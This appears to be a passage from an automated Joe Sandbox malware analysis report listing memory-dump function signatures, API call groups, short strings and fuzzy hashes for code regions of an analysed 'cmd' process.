                                                  • Instruction ID: 729c1eafbd46d8543ec3b5f06b0f6286f94b52163d13966cf3ad8fa1cc7d85f3
                                                  • Opcode Fuzzy Hash: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
                                                  • Instruction Fuzzy Hash: 3C619536529A84C7E760CB19E85831AF7A0F38E745F100116FA9D87BE8DB7DC548CB4A
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2566578597.000002527DEE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DEE0000, based on PE: true
                                                  • Associated: 00000014.00000002.2565302689.000002527DEE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2568003239.000002527DEF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2569195844.000002527DF00000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2570458513.000002527DF02000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2571664744.000002527DF09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_2527dee0000_cmd.jbxd
                                                  Similarity
                                                  • API ID: CurrentProcessProtectVirtual$HandleModule
                                                  • String ID:
                                                  • API String ID: 1092925422-0
                                                  • Opcode ID: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                                                  • Instruction ID: 4947df8182b46b694410fe3e03f3689f6f6b928a58a10d151d071fa025404766
                                                  • Opcode Fuzzy Hash: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                                                  • Instruction Fuzzy Hash: C5112E36615B40D3FB65CB21E80865AE7B0FB4AB82F044026DA4D037E8EF7DC958C788
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2573660018.000002527DF11000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DF10000, based on PE: true
                                                  • Associated: 00000014.00000002.2572815512.000002527DF10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2574698088.000002527DF25000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2575545537.000002527DF30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2576428438.000002527DF32000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2577258999.000002527DF39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_2527df10000_cmd.jbxd
                                                  Similarity
                                                  • API ID: CurrentProcessProtectVirtual$HandleModule
                                                  • String ID:
                                                  • API String ID: 1092925422-0
                                                  • Opcode ID: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                                                  • Instruction ID: 19f3e7c7ae139208335f580184dc3413b29ef7014b85eca1965fbc875f95d344
                                                  • Opcode Fuzzy Hash: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                                                  • Instruction Fuzzy Hash: 9E111626605B41D3EB24DB21E84831AE7B0F74AB95F080126DE5D037D8EB7DD558C789
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2566578597.000002527DEE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DEE0000, based on PE: true
                                                  • Associated: 00000014.00000002.2565302689.000002527DEE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2568003239.000002527DEF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2569195844.000002527DF00000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2570458513.000002527DF02000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2571664744.000002527DF09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_2527dee0000_cmd.jbxd
                                                  Similarity
                                                  • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                  • String ID: csm
                                                  • API String ID: 2395640692-1018135373
                                                  • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                  • Instruction ID: 5c2f07d6a800440fe5abe51c400133ace9c51935190d756f3e1c2e45ca80e3b5
                                                  • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                  • Instruction Fuzzy Hash: 6A51D432311E80CBFB5ACB25EC88B6CB795F39AB99F154121DA4A477D8DB78C849C704
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2573660018.000002527DF11000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DF10000, based on PE: true
                                                  • Associated: 00000014.00000002.2572815512.000002527DF10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2574698088.000002527DF25000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2575545537.000002527DF30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2576428438.000002527DF32000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2577258999.000002527DF39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_2527df10000_cmd.jbxd
                                                  Similarity
                                                  • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                  • String ID: csm
                                                  • API String ID: 2395640692-1018135373
                                                  • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                  • Instruction ID: 218c7376ad86fcb063fceb1bc192f36e7a9ae763a4ac344b52ccc8afbb992f0e
                                                  • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                  • Instruction Fuzzy Hash: BF511732301E00EADB58CF15E94CB6CB791F35AB99F144124DE6A477C8DB7AC849C706
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2566578597.000002527DEE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DEE0000, based on PE: true
                                                  • Associated: 00000014.00000002.2565302689.000002527DEE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2568003239.000002527DEF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2569195844.000002527DF00000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2570458513.000002527DF02000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2571664744.000002527DF09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_2527dee0000_cmd.jbxd
                                                  Similarity
                                                  • API ID: CallEncodePointerTranslator
                                                  • String ID: MOC$RCC
                                                  • API String ID: 3544855599-2084237596
                                                  • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                  • Instruction ID: 882c261d0ab20e97ee580f7e62db06b2a2d993ae6bfdabb67cc244184ddae78d
                                                  • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                  • Instruction Fuzzy Hash: BF619F32504BC4C2EB22CF25E94479AF7A0F78AB99F044219EB9813BD5DB7CC198CB04
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2566578597.000002527DEE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DEE0000, based on PE: true
                                                  • Associated: 00000014.00000002.2565302689.000002527DEE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2568003239.000002527DEF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2569195844.000002527DF00000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2570458513.000002527DF02000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2571664744.000002527DF09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_2527dee0000_cmd.jbxd
                                                  Similarity
                                                  • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                  • String ID: csm$csm
                                                  • API String ID: 3896166516-3733052814
                                                  • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                  • Instruction ID: 5c5b630e88cdec5bdc2d08063a88383d8dbd773f8a78001b521321945897e49f
                                                  • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                  • Instruction Fuzzy Hash: 17518032200B80CBFB76CF31DA48358B7A1F75AB9AF14411ADA9947BD5CB38D458D709
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2573660018.000002527DF11000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DF10000, based on PE: true
                                                  • Associated: 00000014.00000002.2572815512.000002527DF10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2574698088.000002527DF25000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2575545537.000002527DF30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2576428438.000002527DF32000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2577258999.000002527DF39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_2527df10000_cmd.jbxd
                                                  Similarity
                                                  • API ID: CallEncodePointerTranslator
                                                  • String ID: MOC$RCC
                                                  • API String ID: 3544855599-2084237596
                                                  • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                  • Instruction ID: 5380cf3883ef2ff7e5b8a126726b4f4f882cf1557a56e4d3423cdec9f33a1321
                                                  • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                  • Instruction Fuzzy Hash: 7861CD32508BC4C1EB21CF15E94439EF7A0F78AB99F448215EBA813BD9CB39C199CB05
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2573660018.000002527DF11000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DF10000, based on PE: true
                                                  • Associated: 00000014.00000002.2572815512.000002527DF10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2574698088.000002527DF25000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2575545537.000002527DF30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2576428438.000002527DF32000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2577258999.000002527DF39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_2527df10000_cmd.jbxd
                                                  Similarity
                                                  • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                  • String ID: csm$csm
                                                  • API String ID: 3896166516-3733052814
                                                  • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                  • Instruction ID: fc0541b48e77c2fbf6773572276bebd2944f4f5e018167edf1ec6f093410424d
                                                  • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                  • Instruction Fuzzy Hash: AE51D432201B80CBEB74CF12DA48358F7A1F35AB86F144116DAA947BD5CB3AD45AC74B
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000003.2189620345.000002527DEB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002527DEB0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_3_2527deb0000_cmd.jbxd
                                                  Similarity
                                                  • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                  • String ID: csm$csm
                                                  • API String ID: 3896166516-3733052814
                                                  • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                  • Instruction ID: 5aff4a8465f2407c66cc840aed800b108880c478786311b8ffff91a9f4a9c980
                                                  • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                  • Instruction Fuzzy Hash: 5C516132204A80CBEF76CF119E48B68FBE0F35AB96F144115DA9947BD5CB78E458CB09
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2566578597.000002527DEE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DEE0000, based on PE: true
                                                  • Associated: 00000014.00000002.2565302689.000002527DEE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2568003239.000002527DEF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2569195844.000002527DF00000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2570458513.000002527DF02000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2571664744.000002527DF09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_2527dee0000_cmd.jbxd
                                                  Similarity
                                                  • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                  • String ID: pid_
                                                  • API String ID: 517849248-4147670505
                                                  • Opcode ID: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                                                  • Instruction ID: 7a62843f48c07f9f74b00b35efb6c2cf4d938e4e2909eaf4d6757d65c2bf41fe
                                                  • Opcode Fuzzy Hash: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                                                  • Instruction Fuzzy Hash: 9A115E21310F81D3FB52DB36EC4835AA2A4F75EB82F9444259A4D836D8EF78C98DC708
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2573660018.000002527DF11000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DF10000, based on PE: true
                                                  • Associated: 00000014.00000002.2572815512.000002527DF10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2574698088.000002527DF25000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2575545537.000002527DF30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2576428438.000002527DF32000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2577258999.000002527DF39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_2527df10000_cmd.jbxd
                                                  Similarity
                                                  • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                  • String ID: pid_
                                                  • API String ID: 517849248-4147670505
                                                  • Opcode ID: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                                                  • Instruction ID: 4fa9bbf0e5a0377572b543538df4aee52f2079589256d75b53ad59bd14e9fc63
                                                  • Opcode Fuzzy Hash: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                                                  • Instruction Fuzzy Hash: 89117F25310F82D1EB10DB25EC0839AE6E4F74E782F804425DA69836D4EF7AC94DC74A
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2566578597.000002527DEE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DEE0000, based on PE: true
                                                  • Associated: 00000014.00000002.2565302689.000002527DEE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2568003239.000002527DEF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2569195844.000002527DF00000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2570458513.000002527DF02000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2571664744.000002527DF09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_2527dee0000_cmd.jbxd
                                                  Similarity
                                                  • API ID: FileWrite$ConsoleErrorLastOutput
                                                  • String ID:
                                                  • API String ID: 2718003287-0
                                                  • Opcode ID: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                                                  • Instruction ID: 2c26158bb2ceb16ee56ebe59e2b37ee2bcd967fe8cf3e7d06adee3600331b13e
                                                  • Opcode Fuzzy Hash: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                                                  • Instruction Fuzzy Hash: C2D1CB32714A84CAE752CFA5D8482DCB7B2F35AB99F404216CE5DABBD9DB34C10AC744
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2573660018.000002527DF11000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DF10000, based on PE: true
                                                  • Associated: 00000014.00000002.2572815512.000002527DF10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2574698088.000002527DF25000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2575545537.000002527DF30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2576428438.000002527DF32000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2577258999.000002527DF39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_2527df10000_cmd.jbxd
                                                  Similarity
                                                  • API ID: FileWrite$ConsoleErrorLastOutput
                                                  • String ID:
                                                  • API String ID: 2718003287-0
                                                  • Opcode ID: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                                                  • Instruction ID: f5bfd0f21b086f6b035cdc4bf35f44a978cb66ad0f933ddf6f716cbe208585d8
                                                  • Opcode Fuzzy Hash: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                                                  • Instruction Fuzzy Hash: CBD1EA32704A80CAE710CFA5DC4839DB7B1F34AB99F844216CE6DA7BD9DA34D10AC385
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2566578597.000002527DEE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DEE0000, based on PE: true
                                                  • Associated: 00000014.00000002.2565302689.000002527DEE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2568003239.000002527DEF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2569195844.000002527DF00000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2570458513.000002527DF02000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2571664744.000002527DF09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_2527dee0000_cmd.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$Free
                                                  • String ID:
                                                  • API String ID: 3168794593-0
                                                  • Opcode ID: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                                                  • Instruction ID: 643012c8a3779b641f9c28f77f73857ab07dd42024197a4b05d4026c4aa0a446
                                                  • Opcode Fuzzy Hash: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                                                  • Instruction Fuzzy Hash: 56015732610E80DAE755DF66EC08149BBA0F78EF82F094025DB49437A8EE34E295C744
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2573660018.000002527DF11000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DF10000, based on PE: true
                                                  • Associated: 00000014.00000002.2572815512.000002527DF10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2574698088.000002527DF25000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2575545537.000002527DF30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2576428438.000002527DF32000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2577258999.000002527DF39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_2527df10000_cmd.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$Free
                                                  • String ID:
                                                  • API String ID: 3168794593-0
                                                  • Opcode ID: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                                                  • Instruction ID: acede0dc9e98495ac7b8b2263fbb0a2ca34235f3cf367bf292061ff172e002db
                                                  • Opcode Fuzzy Hash: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                                                  • Instruction Fuzzy Hash: 27015732610E90EAE714DF66AC0925EB7A0F78EF85B094025DB69437A8DE38E055C784
                                                  APIs
                                                  • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,000002527DEF28DF), ref: 000002527DEF2A12
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2566578597.000002527DEE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DEE0000, based on PE: true
                                                  • Associated: 00000014.00000002.2565302689.000002527DEE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2568003239.000002527DEF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2569195844.000002527DF00000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2570458513.000002527DF02000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2571664744.000002527DF09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_2527dee0000_cmd.jbxd
                                                  Similarity
                                                  • API ID: ConsoleMode
                                                  • String ID:
                                                  • API String ID: 4145635619-0
                                                  • Opcode ID: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
                                                  • Instruction ID: 8c1085d562dbe0c9e31e34705be67a8a99d193dbcfef09c6c087d29eda5cca8a
                                                  • Opcode Fuzzy Hash: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
                                                  • Instruction Fuzzy Hash: CB91B132610E54DAFBA2CF659C583ADABA0F35FB89F444106DE4A97AC5DB34C44AC308
                                                  APIs
                                                  • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,000002527DF228DF), ref: 000002527DF22A12
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2573660018.000002527DF11000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DF10000, based on PE: true
                                                  • Associated: 00000014.00000002.2572815512.000002527DF10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2574698088.000002527DF25000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2575545537.000002527DF30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2576428438.000002527DF32000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2577258999.000002527DF39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_2527df10000_cmd.jbxd
                                                  Similarity
                                                  • API ID: ConsoleMode
                                                  • String ID:
                                                  • API String ID: 4145635619-0
                                                  • Opcode ID: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
                                                  • Instruction ID: 4175e2b66585a0e8a822c69a13f5f510e820ddbadd1d7d0d8e3fedb934ecbb3a
                                                  • Opcode Fuzzy Hash: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
                                                  • Instruction Fuzzy Hash: F3910132610E50D9FB60CF659C583AEBBA0F35EB99F444106DE2A67BC5CB34D049C78A
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2573660018.000002527DF11000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DF10000, based on PE: true
                                                  • Associated: 00000014.00000002.2572815512.000002527DF10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2574698088.000002527DF25000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2575545537.000002527DF30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2576428438.000002527DF32000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2577258999.000002527DF39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_2527df10000_cmd.jbxd
                                                  Similarity
                                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                  • String ID:
                                                  • API String ID: 2933794660-0
                                                  • Opcode ID: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                                                  • Instruction ID: e4de4b7ef3061a5bbf11ad1a2d174306c51b37ae4cd4956117a43edeeaa50992
                                                  • Opcode Fuzzy Hash: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                                                  • Instruction Fuzzy Hash: 7B112726710F04CAEB00CF60EC593A973A4F71E759F440E25EA6D967E8DB78D1588385
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2566578597.000002527DEE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DEE0000, based on PE: true
                                                  • Associated: 00000014.00000002.2565302689.000002527DEE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2568003239.000002527DEF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2569195844.000002527DF00000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2570458513.000002527DF02000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2571664744.000002527DF09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_2527dee0000_cmd.jbxd
                                                  Similarity
                                                  • API ID: FileType
                                                  • String ID: \\.\pipe\
                                                  • API String ID: 3081899298-91387939
                                                  • Opcode ID: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
                                                  • Instruction ID: ae446885a8b35847f494e10943aa2f3d87b584257ad9c3e5cbdbf9f2baa3c292
                                                  • Opcode Fuzzy Hash: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
                                                  • Instruction Fuzzy Hash: A4718E36200F81D3F776DE3AAC583AAA794F38EB86F54401ADD0943BC8DA75C6088708
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2573660018.000002527DF11000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DF10000, based on PE: true
                                                  • Associated: 00000014.00000002.2572815512.000002527DF10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2574698088.000002527DF25000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2575545537.000002527DF30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2576428438.000002527DF32000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2577258999.000002527DF39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_2527df10000_cmd.jbxd
                                                  Similarity
                                                  • API ID: FileType
                                                  • String ID: \\.\pipe\
                                                  • API String ID: 3081899298-91387939
                                                  • Opcode ID: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
                                                  • Instruction ID: 0d31cc20e0154680a679d6ce7940d9f2c7c5619e963531c2ef59a75cbd70e63b
